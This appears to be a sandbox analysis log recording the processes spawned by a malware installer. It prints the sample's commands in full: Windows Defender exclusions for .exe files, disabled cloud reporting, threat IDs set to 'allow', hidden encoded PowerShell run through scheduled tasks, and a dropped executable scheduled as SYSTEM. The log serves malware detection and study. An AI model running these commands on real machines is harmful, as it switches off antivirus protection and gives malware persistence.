Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "goSRLihgj"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "goSRLihgj"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe UB /site_id 525403 /S
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\System32\gpupdate.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe .\Install.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe .\Install.exe /S /site_id "525403"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "goSRLihgj"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "goSRLihgj"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /FJump to behavior
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParamJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64Jump to behavior
